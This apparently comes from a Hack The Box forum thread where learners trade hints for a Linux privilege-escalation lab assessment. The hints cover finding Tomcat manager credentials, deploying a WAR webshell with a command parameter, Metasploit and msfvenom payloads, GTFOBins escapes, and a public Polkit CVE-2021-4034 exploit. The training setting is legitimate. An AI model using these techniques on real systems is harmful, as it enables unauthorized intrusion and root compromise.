Linux Local Privilege Escalation - Skills Assessment

Hello,
I stuck at flag4. So, to be honest I dont havy any ideas how should I proceed. I saw that tomcat folder has “S” priv but no idea how should I proceed. SHould I look for some specific logs?

EDIT: I found a user: tomcatadm with its password. But it is not the actual user tomcat for the flag4. What I am missing? WHat is this user ?

I don’t know if this is still relevant, but you should think where you could else use the found credentials.

With credentials and login admin page, u can deploy reverse shell via upload file and trigger it. You can got flag 4 and flag 5 is not hard. GTFOBins help you escape privilege

Trying to get to flag4. I uploaded a WAR webshell to Tomcat via manager panel. It will appear in Application endpoints list, but will not execute. It just gives me a 404 error, even though I’ve completely removed all the authorization logic from the backdoor (IP address check). I tried all path variations like: /cmd, /cmd/cmd.jsp?cmd=, but no luck. I used a webshell from Laudanum directory. Am I doing something wrong? Any other ways to get to tomcat’s user shell?

Solved it. Just needed to specify ‘warfiles’ directory inside the archive, that was created by the script, like: /cmd/warfiles/cmd.jsp?cmd=id

Hy everyone,

I am at flag5. I have a webshell and try to get a meterpreter revshell using the multi/http/tomcat_mgr_upload moudle,

I set username,password, RPORTS, LPORT=8080 but when I start the exploit it gives back this message:

Does somebody know why the server does not return a fingerprint even though it is clearly running under 8080?

Btw: does somebody know how to execute msfvenom war payloads on the webserver. Do I just need to click on it? Because I only get a error message and no callback to my multi/handler.

2 Likes

I strucked in flag4,I need help. Thx

there is a way to do this box without going the route of tomcat, if you have a precompiled binary

1 Like

Yep you can eat sandwich as barry

How to do it. I compile it with make on my machine and I run it on client i get: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34’ not found

Please help

or compile with the glibc included with -shared, or move the source files to the victim’s machine and compile from there.

that was a fun one and not too difficult, but it’s most probably also due to the fact that i’m getting used to HTB: passwords not working → reset machine; pages not showing up → reset machine; can’t ping anymore → reset machine. wrong explanations or hints blah blah blah.

but seems like linux privilege escalation is one of my favorite thing. fun to scratch one’s head and finding all the way you can bypass those restrictions :stuck_out_tongue:

This was surprisingly easy, considering I have spent about a month slowly going through the entire module. I think in total from flag 1 to flag 5 took less than 30 minutes. For anyone struggling with flags 1-3, enumeration is your friend. I started out looking for the location of all the flags with find / -name "*flag1.txt* 2>/dev/null the wildcards are important here and don’t forget to specify the flag number. I had issues trying to find them all at once. You will find flag 1 easily like this. Flag 2, once you find the location, the rest is HISTORY :wink:. Flag 3, again, enumerate. Flag 4 I think I was pretty lucky to find so quickly. I had previously done a box which used the exact same method and it was the first thing I thought of when seeing the service that was running. Remember, it’s okay to lose the battle as long as you win the WAR :wink:. If you are struggling to get the rev shell try creating the payload with msfvenom, I had no issues with it. Flag 5 I think is easier than flag 4. GTFObins is your friend. The only issue I encountered was the method not working on my restricted shell. I had to upgrade to an interactive TTY with python before I was able to finally get root.

Right now I’m trying to get into the box by popping a shell rather than the SSH credentials provided. So far that has been harder than all the flags and I haven’t been able to find much info online about the method other than keep trying and keep enumerating. If anyone has any tips for that it would be very much appreciated.

All in all, this was a nice confidence booster but I also think the methods used to get the flags are way less complicated than the methods that you learn going through the module. I was expecting to spend a lot of time on this but I think it just goes to show that even if you feel like you’re not learning much or that you’re progressing very slowly, subconsciously you are learning way more than you think. For reference, I’ve been on the PT path for close to 9 months, trying to find time to complete the modules between work and other activities.

Good luck everyone!

I am stuck with flag4… I cant find the tomactadm password… I have tried many things and keep trying to obtain a root shell by exploiting the sudo version…

To capture the flags using the tomcat with reverse shell approach, pay attention to the files under directory /etc/tomcat9/ , you can get the password for tomcatadm there.

Another simpler approach is to attack the Polkit vulnerability with CVE-2021-4034. You may download the CVE-2021-4034.py and transfer to the target and execute the script, you get the root shell there.

I found out how, it’s not that hard, reply if you need help

I have the Tomcat credentials, but the web login dosnt seem to work? every time I enter the creds it just brings ups the simple http login again. Im not getting login failed etc. Are there more than one set of creds for Tomcat? or is this machine just flaky?